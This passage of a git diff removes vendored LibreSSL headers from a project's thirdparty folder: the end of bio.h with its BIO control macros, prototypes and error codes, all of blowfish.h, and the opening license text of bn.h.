-#define BIO_C_RESET_READ_REQUEST		147
-#define BIO_C_SET_MD_CTX			148
-
-#define BIO_C_SET_PREFIX			149
-#define BIO_C_GET_PREFIX			150
-#define BIO_C_SET_SUFFIX			151
-#define BIO_C_GET_SUFFIX			152
-
-#define BIO_C_SET_EX_ARG			153
-#define BIO_C_GET_EX_ARG			154
-
-#define BIO_set_app_data(s,arg)		BIO_set_ex_data(s,0,arg)
-#define BIO_get_app_data(s)		BIO_get_ex_data(s,0)
-
-/* BIO_s_connect() and BIO_s_socks4a_connect() */
-#define BIO_set_conn_hostname(b,name) BIO_ctrl(b,BIO_C_SET_CONNECT,0,(char *)name)
-#define BIO_set_conn_port(b,port) BIO_ctrl(b,BIO_C_SET_CONNECT,1,(char *)port)
-#define BIO_set_conn_ip(b,ip)	  BIO_ctrl(b,BIO_C_SET_CONNECT,2,(char *)ip)
-#define BIO_set_conn_int_port(b,port) BIO_ctrl(b,BIO_C_SET_CONNECT,3,(char *)port)
-#define BIO_get_conn_hostname(b)  BIO_ptr_ctrl(b,BIO_C_GET_CONNECT,0)
-#define BIO_get_conn_port(b)      BIO_ptr_ctrl(b,BIO_C_GET_CONNECT,1)
-#define BIO_get_conn_ip(b) 		 BIO_ptr_ctrl(b,BIO_C_GET_CONNECT,2)
-#define BIO_get_conn_int_port(b) BIO_int_ctrl(b,BIO_C_GET_CONNECT,3,0)
-
-
-#define BIO_set_nbio(b,n)	BIO_ctrl(b,BIO_C_SET_NBIO,(n),NULL)
-
-/* BIO_s_accept_socket() */
-#define BIO_set_accept_port(b,name) BIO_ctrl(b,BIO_C_SET_ACCEPT,0,(char *)name)
-#define BIO_get_accept_port(b)	BIO_ptr_ctrl(b,BIO_C_GET_ACCEPT,0)
-/* #define BIO_set_nbio(b,n)	BIO_ctrl(b,BIO_C_SET_NBIO,(n),NULL) */
-#define BIO_set_nbio_accept(b,n) BIO_ctrl(b,BIO_C_SET_ACCEPT,1,(n)?(void *)"a":NULL)
-#define BIO_set_accept_bios(b,bio) BIO_ctrl(b,BIO_C_SET_ACCEPT,2,(char *)bio)
-
-#define BIO_BIND_NORMAL			0
-#define BIO_BIND_REUSEADDR_IF_UNUSED	1
-#define BIO_BIND_REUSEADDR		2
-#define BIO_set_bind_mode(b,mode) BIO_ctrl(b,BIO_C_SET_BIND_MODE,mode,NULL)
-#define BIO_get_bind_mode(b,mode) BIO_ctrl(b,BIO_C_GET_BIND_MODE,0,NULL)
-
-#define BIO_do_connect(b)	BIO_do_handshake(b)
-#define BIO_do_accept(b)	BIO_do_handshake(b)
-#define BIO_do_handshake(b)	BIO_ctrl(b,BIO_C_DO_STATE_MACHINE,0,NULL)
-
-/* BIO_s_proxy_client() */
-#define BIO_set_url(b,url)	BIO_ctrl(b,BIO_C_SET_PROXY_PARAM,0,(char *)(url))
-#define BIO_set_proxies(b,p)	BIO_ctrl(b,BIO_C_SET_PROXY_PARAM,1,(char *)(p))
-/* BIO_set_nbio(b,n) */
-#define BIO_set_filter_bio(b,s) BIO_ctrl(b,BIO_C_SET_PROXY_PARAM,2,(char *)(s))
-/* BIO *BIO_get_filter_bio(BIO *bio); */
-#define BIO_set_proxy_cb(b,cb) BIO_callback_ctrl(b,BIO_C_SET_PROXY_PARAM,3,(void *(*cb)()))
-#define BIO_set_proxy_header(b,sk) BIO_ctrl(b,BIO_C_SET_PROXY_PARAM,4,(char *)sk)
-#define BIO_set_no_connect_return(b,bool) BIO_int_ctrl(b,BIO_C_SET_PROXY_PARAM,5,bool)
-
-#define BIO_get_proxy_header(b,skp) BIO_ctrl(b,BIO_C_GET_PROXY_PARAM,0,(char *)skp)
-#define BIO_get_proxies(b,pxy_p) BIO_ctrl(b,BIO_C_GET_PROXY_PARAM,1,(char *)(pxy_p))
-#define BIO_get_url(b,url)	BIO_ctrl(b,BIO_C_GET_PROXY_PARAM,2,(char *)(url))
-#define BIO_get_no_connect_return(b)	BIO_ctrl(b,BIO_C_GET_PROXY_PARAM,5,NULL)
-
-#define BIO_set_fd(b,fd,c)	BIO_int_ctrl(b,BIO_C_SET_FD,c,fd)
-#define BIO_get_fd(b,c)		BIO_ctrl(b,BIO_C_GET_FD,0,(char *)c)
-
-#define BIO_set_fp(b,fp,c)	BIO_ctrl(b,BIO_C_SET_FILE_PTR,c,(char *)fp)
-#define BIO_get_fp(b,fpp)	BIO_ctrl(b,BIO_C_GET_FILE_PTR,0,(char *)fpp)
-
-#define BIO_seek(b,ofs)	(int)BIO_ctrl(b,BIO_C_FILE_SEEK,ofs,NULL)
-#define BIO_tell(b)	(int)BIO_ctrl(b,BIO_C_FILE_TELL,0,NULL)
-
-/* name is cast to lose const, but might be better to route through a function
-   so we can do it safely */
-#define BIO_read_filename(b,name) BIO_ctrl(b,BIO_C_SET_FILENAME, \
-		BIO_CLOSE|BIO_FP_READ,(char *)name)
-#define BIO_write_filename(b,name) BIO_ctrl(b,BIO_C_SET_FILENAME, \
-		BIO_CLOSE|BIO_FP_WRITE,name)
-#define BIO_append_filename(b,name) BIO_ctrl(b,BIO_C_SET_FILENAME, \
-		BIO_CLOSE|BIO_FP_APPEND,name)
-#define BIO_rw_filename(b,name) BIO_ctrl(b,BIO_C_SET_FILENAME, \
-		BIO_CLOSE|BIO_FP_READ|BIO_FP_WRITE,name)
-
-/* WARNING WARNING, this ups the reference count on the read bio of the
- * SSL structure.  This is because the ssl read BIO is now pointed to by
- * the next_bio field in the bio.  So when you free the BIO, make sure
- * you are doing a BIO_free_all() to catch the underlying BIO. */
-#define BIO_set_ssl(b,ssl,c)	BIO_ctrl(b,BIO_C_SET_SSL,c,(char *)ssl)
-#define BIO_get_ssl(b,sslp)	BIO_ctrl(b,BIO_C_GET_SSL,0,(char *)sslp)
-#define BIO_set_ssl_mode(b,client)	BIO_ctrl(b,BIO_C_SSL_MODE,client,NULL)
-#define BIO_set_ssl_renegotiate_bytes(b,num) \
-	BIO_ctrl(b,BIO_C_SET_SSL_RENEGOTIATE_BYTES,num,NULL)
-#define BIO_get_num_renegotiates(b) \
-	BIO_ctrl(b,BIO_C_GET_SSL_NUM_RENEGOTIATES,0,NULL)
-#define BIO_set_ssl_renegotiate_timeout(b,seconds) \
-	BIO_ctrl(b,BIO_C_SET_SSL_RENEGOTIATE_TIMEOUT,seconds,NULL)
-
-/* defined in evp.h */
-/* #define BIO_set_md(b,md)	BIO_ctrl(b,BIO_C_SET_MD,1,(char *)md) */
-
-#define BIO_get_mem_data(b,pp)	BIO_ctrl(b,BIO_CTRL_INFO,0,(char *)pp)
-#define BIO_set_mem_buf(b,bm,c)	BIO_ctrl(b,BIO_C_SET_BUF_MEM,c,(char *)bm)
-#define BIO_get_mem_ptr(b,pp)	BIO_ctrl(b,BIO_C_GET_BUF_MEM_PTR,0,(char *)pp)
-#define BIO_set_mem_eof_return(b,v) \
-				BIO_ctrl(b,BIO_C_SET_BUF_MEM_EOF_RETURN,v,NULL)
-
-/* For the BIO_f_buffer() type */
-#define BIO_get_buffer_num_lines(b)	BIO_ctrl(b,BIO_C_GET_BUFF_NUM_LINES,0,NULL)
-#define BIO_set_buffer_size(b,size)	BIO_ctrl(b,BIO_C_SET_BUFF_SIZE,size,NULL)
-#define BIO_set_read_buffer_size(b,size) BIO_int_ctrl(b,BIO_C_SET_BUFF_SIZE,size,0)
-#define BIO_set_write_buffer_size(b,size) BIO_int_ctrl(b,BIO_C_SET_BUFF_SIZE,size,1)
-#define BIO_set_buffer_read_data(b,buf,num) BIO_ctrl(b,BIO_C_SET_BUFF_READ_DATA,num,buf)
-
-/* Don't use the next one unless you know what you are doing :-) */
-#define BIO_dup_state(b,ret)	BIO_ctrl(b,BIO_CTRL_DUP,0,(char *)(ret))
-
-#define BIO_reset(b)		(int)BIO_ctrl(b,BIO_CTRL_RESET,0,NULL)
-#define BIO_eof(b)		(int)BIO_ctrl(b,BIO_CTRL_EOF,0,NULL)
-#define BIO_set_close(b,c)	(int)BIO_ctrl(b,BIO_CTRL_SET_CLOSE,(c),NULL)
-#define BIO_get_close(b)	(int)BIO_ctrl(b,BIO_CTRL_GET_CLOSE,0,NULL)
-#define BIO_pending(b)		(int)BIO_ctrl(b,BIO_CTRL_PENDING,0,NULL)
-#define BIO_wpending(b)		(int)BIO_ctrl(b,BIO_CTRL_WPENDING,0,NULL)
-/* ...pending macros have inappropriate return type */
-size_t BIO_ctrl_pending(BIO *b);
-size_t BIO_ctrl_wpending(BIO *b);
-#define BIO_flush(b)		(int)BIO_ctrl(b,BIO_CTRL_FLUSH,0,NULL)
-#define BIO_get_info_callback(b,cbp) (int)BIO_ctrl(b,BIO_CTRL_GET_CALLBACK,0, \
-						   cbp)
-#define BIO_set_info_callback(b,cb) (int)BIO_callback_ctrl(b,BIO_CTRL_SET_CALLBACK,cb)
-
-/* For the BIO_f_buffer() type */
-#define BIO_buffer_get_num_lines(b) BIO_ctrl(b,BIO_CTRL_GET,0,NULL)
-
-/* For BIO_s_bio() */
-#define BIO_set_write_buf_size(b,size) (int)BIO_ctrl(b,BIO_C_SET_WRITE_BUF_SIZE,size,NULL)
-#define BIO_get_write_buf_size(b,size) (size_t)BIO_ctrl(b,BIO_C_GET_WRITE_BUF_SIZE,size,NULL)
-#define BIO_make_bio_pair(b1,b2)   (int)BIO_ctrl(b1,BIO_C_MAKE_BIO_PAIR,0,b2)
-#define BIO_destroy_bio_pair(b)    (int)BIO_ctrl(b,BIO_C_DESTROY_BIO_PAIR,0,NULL)
-#define BIO_shutdown_wr(b) (int)BIO_ctrl(b, BIO_C_SHUTDOWN_WR, 0, NULL)
-/* macros with inappropriate type -- but ...pending macros use int too: */
-#define BIO_get_write_guarantee(b) (int)BIO_ctrl(b,BIO_C_GET_WRITE_GUARANTEE,0,NULL)
-#define BIO_get_read_request(b)    (int)BIO_ctrl(b,BIO_C_GET_READ_REQUEST,0,NULL)
-size_t BIO_ctrl_get_write_guarantee(BIO *b);
-size_t BIO_ctrl_get_read_request(BIO *b);
-int BIO_ctrl_reset_read_request(BIO *b);
-
-/* ctrl macros for dgram */
-#define BIO_ctrl_dgram_connect(b,peer)  \
-                     (int)BIO_ctrl(b,BIO_CTRL_DGRAM_CONNECT,0, (char *)peer)
-#define BIO_ctrl_set_connected(b, state, peer) \
-         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_SET_CONNECTED, state, (char *)peer)
-#define BIO_dgram_recv_timedout(b) \
-         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_GET_RECV_TIMER_EXP, 0, NULL)
-#define BIO_dgram_send_timedout(b) \
-         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_GET_SEND_TIMER_EXP, 0, NULL)
-#define BIO_dgram_get_peer(b,peer) \
-         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_GET_PEER, 0, (char *)peer)
-#define BIO_dgram_set_peer(b,peer) \
-         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_SET_PEER, 0, (char *)peer)
-
-/* These two aren't currently implemented */
-/* int BIO_get_ex_num(BIO *bio); */
-/* void BIO_set_ex_free_func(BIO *bio,int idx,void (*cb)()); */
-int BIO_set_ex_data(BIO *bio, int idx, void *data);
-void *BIO_get_ex_data(BIO *bio, int idx);
-int
-BIO_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-unsigned long BIO_number_read(BIO *bio);
-unsigned long BIO_number_written(BIO *bio);
-
-/* For BIO_f_asn1() */
-int
-BIO_asn1_set_prefix(BIO *b, asn1_ps_func *prefix,
-asn1_ps_func *prefix_free);
-int
-BIO_asn1_get_prefix(BIO *b, asn1_ps_func **pprefix,
-asn1_ps_func **pprefix_free);
-int
-BIO_asn1_set_suffix(BIO *b, asn1_ps_func *suffix,
-asn1_ps_func *suffix_free);
-int
-BIO_asn1_get_suffix(BIO *b, asn1_ps_func **psuffix,
-asn1_ps_func **psuffix_free);
-
-BIO_METHOD *BIO_s_file(void );
-BIO *BIO_new_file(const char *filename, const char *mode);
-BIO *BIO_new_fp(FILE *stream, int close_flag);
-# define BIO_s_file_internal	BIO_s_file
-BIO *	BIO_new(BIO_METHOD *type);
-int	BIO_set(BIO *a, BIO_METHOD *type);
-int	BIO_free(BIO *a);
-void	BIO_vfree(BIO *a);
-int	BIO_read(BIO *b, void *data, int len)
-		__attribute__((__bounded__(__buffer__,2,3)));
-int	BIO_gets(BIO *bp, char *buf, int size)
-		__attribute__((__bounded__ (__string__,2,3)));
-int	BIO_write(BIO *b, const void *data, int len)
-		__attribute__((__bounded__(__buffer__,2,3)));
-int	BIO_puts(BIO *bp, const char *buf);
-int	BIO_indent(BIO *b, int indent, int max);
-long	BIO_ctrl(BIO *bp, int cmd, long larg, void *parg);
-long	BIO_callback_ctrl(BIO *b, int cmd,
-	    void (*fp)(struct bio_st *, int, const char *, int, long, long));
-char *	BIO_ptr_ctrl(BIO *bp, int cmd, long larg);
-long	BIO_int_ctrl(BIO *bp, int cmd, long larg, int iarg);
-BIO *	BIO_push(BIO *b, BIO *append);
-BIO *	BIO_pop(BIO *b);
-void	BIO_free_all(BIO *a);
-BIO *	BIO_find_type(BIO *b, int bio_type);
-BIO *	BIO_next(BIO *b);
-BIO *	BIO_get_retry_BIO(BIO *bio, int *reason);
-int	BIO_get_retry_reason(BIO *bio);
-BIO *	BIO_dup_chain(BIO *in);
-
-int BIO_nread0(BIO *bio, char **buf);
-int BIO_nread(BIO *bio, char **buf, int num);
-int BIO_nwrite0(BIO *bio, char **buf);
-int BIO_nwrite(BIO *bio, char **buf, int num);
-
-long BIO_debug_callback(BIO *bio, int cmd, const char *argp, int argi,
-    long argl, long ret);
-
-BIO_METHOD *BIO_s_mem(void);
-BIO *BIO_new_mem_buf(void *buf, int len);
-BIO_METHOD *BIO_s_socket(void);
-BIO_METHOD *BIO_s_connect(void);
-BIO_METHOD *BIO_s_accept(void);
-BIO_METHOD *BIO_s_fd(void);
-BIO_METHOD *BIO_s_log(void);
-BIO_METHOD *BIO_s_bio(void);
-BIO_METHOD *BIO_s_null(void);
-BIO_METHOD *BIO_f_null(void);
-BIO_METHOD *BIO_f_buffer(void);
-BIO_METHOD *BIO_f_nbio_test(void);
-#ifndef OPENSSL_NO_DGRAM
-BIO_METHOD *BIO_s_datagram(void);
-#endif
-
-/* BIO_METHOD *BIO_f_ber(void); */
-
-int BIO_sock_should_retry(int i);
-int BIO_sock_non_fatal_error(int _error);
-int BIO_dgram_non_fatal_error(int _error);
-
-int BIO_fd_should_retry(int i);
-int BIO_fd_non_fatal_error(int _error);
-int
-BIO_dump_cb(int (*cb)(const void *data, size_t len, void *u),
-void *u, const char *s, int len);
-int
-BIO_dump_indent_cb(int (*cb)(const void *data, size_t len, void *u),
-void *u, const char *s, int len, int indent);
-int BIO_dump(BIO *b, const char *bytes, int len);
-int BIO_dump_indent(BIO *b, const char *bytes, int len, int indent);
-int BIO_dump_fp(FILE *fp, const char *s, int len);
-int BIO_dump_indent_fp(FILE *fp, const char *s, int len, int indent);
-struct hostent *BIO_gethostbyname(const char *name);
-/* We might want a thread-safe interface too:
- * struct hostent *BIO_gethostbyname_r(const char *name,
- *     struct hostent *result, void *buffer, size_t buflen);
- * or something similar (caller allocates a struct hostent,
- * pointed to by "result", and additional buffer space for the various
- * substructures; if the buffer does not suffice, NULL is returned
- * and an appropriate error code is set).
- */
-int BIO_sock_error(int sock);
-int BIO_socket_ioctl(int fd, long type, void *arg);
-int BIO_socket_nbio(int fd, int mode);
-int BIO_get_port(const char *str, unsigned short *port_ptr);
-int BIO_get_host_ip(const char *str, unsigned char *ip);
-int BIO_get_accept_socket(char *host_port, int mode);
-int BIO_accept(int sock, char **ip_port);
-int BIO_sock_init(void );
-void BIO_sock_cleanup(void);
-int BIO_set_tcp_ndelay(int sock, int turn_on);
-
-BIO *BIO_new_socket(int sock, int close_flag);
-BIO *BIO_new_dgram(int fd, int close_flag);
-BIO *BIO_new_fd(int fd, int close_flag);
-BIO *BIO_new_connect(char *host_port);
-BIO *BIO_new_accept(char *host_port);
-
-int
-BIO_new_bio_pair(BIO **bio1, size_t writebuf1,
-BIO **bio2, size_t writebuf2);
-/* If successful, returns 1 and in *bio1, *bio2 two BIO pair endpoints.
- * Otherwise returns 0 and sets *bio1 and *bio2 to NULL.
- * Size 0 uses default value.
- */
-
-void BIO_copy_next_retry(BIO *b);
-
-/*long BIO_ghbn_ctrl(int cmd,int iarg,char *parg);*/
-
-#ifdef __MINGW_PRINTF_FORMAT
-int
-BIO_printf(BIO *bio, const char *format, ...)
-	__attribute__((__format__(__MINGW_PRINTF_FORMAT, 2, 3), __nonnull__(2)));
-int
-BIO_vprintf(BIO *bio, const char *format, va_list args)
-	__attribute__((__format__(__MINGW_PRINTF_FORMAT, 2, 0), __nonnull__(2)));
-int
-BIO_snprintf(char *buf, size_t n, const char *format, ...)
-	__attribute__((__deprecated__, __format__(__MINGW_PRINTF_FORMAT, 3, 4),
-	    __nonnull__(3)));
-int
-BIO_vsnprintf(char *buf, size_t n, const char *format, va_list args)
-	__attribute__((__deprecated__, __format__(__MINGW_PRINTF_FORMAT, 3, 0),
-	    __nonnull__(3)));
-#else
-int
-BIO_printf(BIO *bio, const char *format, ...)
-	__attribute__((__format__(__printf__, 2, 3), __nonnull__(2)));
-int
-BIO_vprintf(BIO *bio, const char *format, va_list args)
-	__attribute__((__format__(__printf__, 2, 0), __nonnull__(2)));
-int
-BIO_snprintf(char *buf, size_t n, const char *format, ...)
-	__attribute__((__deprecated__, __format__(__printf__, 3, 4),
-	    __nonnull__(3)));
-int
-BIO_vsnprintf(char *buf, size_t n, const char *format, va_list args)
-	__attribute__((__deprecated__, __format__(__printf__, 3, 0),
-	    __nonnull__(3)));
-#endif
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_BIO_strings(void);
-
-/* Error codes for the BIO functions. */
-
-/* Function codes. */
-#define BIO_F_ACPT_STATE				 100
-#define BIO_F_BIO_ACCEPT				 101
-#define BIO_F_BIO_BER_GET_HEADER			 102
-#define BIO_F_BIO_CALLBACK_CTRL				 131
-#define BIO_F_BIO_CTRL					 103
-#define BIO_F_BIO_GETHOSTBYNAME				 120
-#define BIO_F_BIO_GETS					 104
-#define BIO_F_BIO_GET_ACCEPT_SOCKET			 105
-#define BIO_F_BIO_GET_HOST_IP				 106
-#define BIO_F_BIO_GET_PORT				 107
-#define BIO_F_BIO_MAKE_PAIR				 121
-#define BIO_F_BIO_NEW					 108
-#define BIO_F_BIO_NEW_FILE				 109
-#define BIO_F_BIO_NEW_MEM_BUF				 126
-#define BIO_F_BIO_NREAD					 123
-#define BIO_F_BIO_NREAD0				 124
-#define BIO_F_BIO_NWRITE				 125
-#define BIO_F_BIO_NWRITE0				 122
-#define BIO_F_BIO_PUTS					 110
-#define BIO_F_BIO_READ					 111
-#define BIO_F_BIO_SOCK_INIT				 112
-#define BIO_F_BIO_WRITE					 113
-#define BIO_F_BUFFER_CTRL				 114
-#define BIO_F_CONN_CTRL					 127
-#define BIO_F_CONN_STATE				 115
-#define BIO_F_DGRAM_SCTP_READ				 132
-#define BIO_F_FILE_CTRL					 116
-#define BIO_F_FILE_READ					 130
-#define BIO_F_LINEBUFFER_CTRL				 129
-#define BIO_F_MEM_READ					 128
-#define BIO_F_MEM_WRITE					 117
-#define BIO_F_SSL_NEW					 118
-#define BIO_F_WSASTARTUP				 119
-
-/* Reason codes. */
-#define BIO_R_ACCEPT_ERROR				 100
-#define BIO_R_BAD_FOPEN_MODE				 101
-#define BIO_R_BAD_HOSTNAME_LOOKUP			 102
-#define BIO_R_BROKEN_PIPE				 124
-#define BIO_R_CONNECT_ERROR				 103
-#define BIO_R_EOF_ON_MEMORY_BIO				 127
-#define BIO_R_ERROR_SETTING_NBIO			 104
-#define BIO_R_ERROR_SETTING_NBIO_ON_ACCEPTED_SOCKET	 105
-#define BIO_R_ERROR_SETTING_NBIO_ON_ACCEPT_SOCKET	 106
-#define BIO_R_GETHOSTBYNAME_ADDR_IS_NOT_AF_INET		 107
-#define BIO_R_INVALID_ARGUMENT				 125
-#define BIO_R_INVALID_IP_ADDRESS			 108
-#define BIO_R_INVALID_PORT_NUMBER			 129
-#define BIO_R_IN_USE					 123
-#define BIO_R_KEEPALIVE					 109
-#define BIO_R_NBIO_CONNECT_ERROR			 110
-#define BIO_R_NO_ACCEPT_PORT_SPECIFIED			 111
-#define BIO_R_NO_HOSTNAME_SPECIFIED			 112
-#define BIO_R_NO_PORT_DEFINED				 113
-#define BIO_R_NO_PORT_SPECIFIED				 114
-#define BIO_R_NO_SUCH_FILE				 128
-#define BIO_R_NULL_PARAMETER				 115
-#define BIO_R_TAG_MISMATCH				 116
-#define BIO_R_UNABLE_TO_BIND_SOCKET			 117
-#define BIO_R_UNABLE_TO_CREATE_SOCKET			 118
-#define BIO_R_UNABLE_TO_LISTEN_SOCKET			 119
-#define BIO_R_UNINITIALIZED				 120
-#define BIO_R_UNSUPPORTED_METHOD			 121
-#define BIO_R_WRITE_TO_READ_ONLY_BIO			 126
-#define BIO_R_WSASTARTUP				 122
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/blowfish.h b/thirdparty/libressl/include/openssl/blowfish.h
deleted file mode 100644
index 4d2db80..0000000
--- a/thirdparty/libressl/include/openssl/blowfish.h
+++ /dev/null
@@ -1,112 +0,0 @@
-/* $OpenBSD: blowfish.h,v 1.14 2014/07/10 09:01:04 miod Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_BLOWFISH_H
-#define HEADER_BLOWFISH_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifdef OPENSSL_NO_BF
-#error BF is disabled.
-#endif
-
-#define BF_ENCRYPT	1
-#define BF_DECRYPT	0
-
-/*
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- * ! BF_LONG has to be at least 32 bits wide. If it's wider, then !
- * ! BF_LONG_LOG2 has to be defined along.                        !
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- */
-
-#define BF_LONG unsigned int
-
-#define BF_ROUNDS	16
-#define BF_BLOCK	8
-
-typedef struct bf_key_st
-	{
-	BF_LONG P[BF_ROUNDS+2];
-	BF_LONG S[4*256];
-	} BF_KEY;
-
-void BF_set_key(BF_KEY *key, int len, const unsigned char *data);
-
-void BF_encrypt(BF_LONG *data,const BF_KEY *key);
-void BF_decrypt(BF_LONG *data,const BF_KEY *key);
-
-void BF_ecb_encrypt(const unsigned char *in, unsigned char *out,
-	const BF_KEY *key, int enc);
-void BF_cbc_encrypt(const unsigned char *in, unsigned char *out, long length,
-	const BF_KEY *schedule, unsigned char *ivec, int enc);
-void BF_cfb64_encrypt(const unsigned char *in, unsigned char *out, long length,
-	const BF_KEY *schedule, unsigned char *ivec, int *num, int enc);
-void BF_ofb64_encrypt(const unsigned char *in, unsigned char *out, long length,
-	const BF_KEY *schedule, unsigned char *ivec, int *num);
-const char *BF_options(void);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/bn.h b/thirdparty/libressl/include/openssl/bn.h
deleted file mode 100644
index 0dde08a..0000000
--- a/thirdparty/libressl/include/openssl/bn.h
+++ /dev/null
@@ -1,714 +0,0 @@
-/* $OpenBSD: bn.h,v 1.36 2017/01/25 06:15:44 beck Exp $ */
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
